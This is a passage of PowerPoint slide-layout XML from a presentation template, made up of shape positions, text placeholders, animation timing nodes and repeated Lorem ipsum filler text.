              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaecenas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rounded Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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4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3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3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3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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="3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4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3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3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3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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="5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4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4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4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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="6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3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3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3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" grpId="0" animBg="1"/>
      <p:bldP spid="13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animBg="1"/>
      <p:bldP spid="33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3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3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 animBg="1"/>
      <p:bldP spid="41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4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4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conic lis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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text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03251" y="827103"/>
            <a:ext cx="10972800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3" name="Rounded Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10706102" y="1852537"/>
            <a:ext cx="2027765" cy="782954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39" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10787243" y="1898259"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26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6421968" y="1681481"/>
            <a:ext cx="4121149" cy="440148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27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6421971" y="2162272"/>
            <a:ext cx="4121148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r">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaecenas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rounded Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10706102" y="3330817"/>
            <a:ext cx="2027765" cy="782954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43" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10787243" y="3376539"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="44" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6421968" y="3159761"/>
            <a:ext cx="4121149" cy="440148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35" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="45" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6421971" y="3640552"/>
            <a:ext cx="4121148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r">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaecenas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Rounded Rectangle 39"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10706102" y="4809097"/>
            <a:ext cx="2027765" cy="782954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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="49" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10787243" y="4854819"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="50" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6421968" y="4638041"/>
            <a:ext cx="4121149" cy="440148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43" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="51" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6421971" y="5118832"/>
            <a:ext cx="4121148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r">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaecenas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rounded Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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4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3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3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3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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="3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4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3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3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3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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="5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4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4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4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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="6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3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3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3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" grpId="0" animBg="1"/>
      <p:bldP spid="13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animBg="1"/>
      <p:bldP spid="33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3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3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 animBg="1"/>
      <p:bldP spid="41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4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4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rcle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Oval 52"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="861369" y="1766844"/>
            <a:ext cx="3120004" cy="2808000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381000" cap="rnd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384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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text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03251" y="827103"/>
            <a:ext cx="10972800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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rounded Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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8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964496" y="5151591"/>
            <a:ext cx="2941464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6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29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964501" y="5461324"/>
            <a:ext cx="2941463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08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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaecen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099962" y="1991361"/>
            <a:ext cx="2639997" cy="2375998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25" name="Oval 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4518970" y="1766844"/>
            <a:ext cx="3120004" cy="2808000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381000" cap="rnd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384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4622088" y="5151591"/>
            <a:ext cx="2941464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6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27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4622093" y="5461324"/>
            <a:ext cx="2941463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08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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaecen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4757555" y="1991361"/>
            <a:ext cx="2639997" cy="2375998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34" name="Oval 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8199147" y="1766844"/>
            <a:ext cx="3120004" cy="2808000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381000" cap="rnd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384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8295917" y="5151591"/>
            <a:ext cx="2941464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6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36" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8295922" y="5461324"/>
            <a:ext cx="2941463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08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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaecen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8453962" y="1991361"/>
            <a:ext cx="2639997" cy="2375998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0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="70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/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="2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/>
      <p:bldP spid="34" grpId="0" animBg="1"/>
      <p:bldP spid="3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 showMasterSp="0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495CA-CB87-42F5-AD11-A63647B25AC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33C9F-EFB6-4360-A5D6-81DD839FD7B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ound bars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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text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03251" y="827103"/>
            <a:ext cx="10972800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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rounded Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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8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964496" y="5151591"/>
            <a:ext cx="2941464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6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29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964501" y="5461324"/>
            <a:ext cx="2941463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08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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
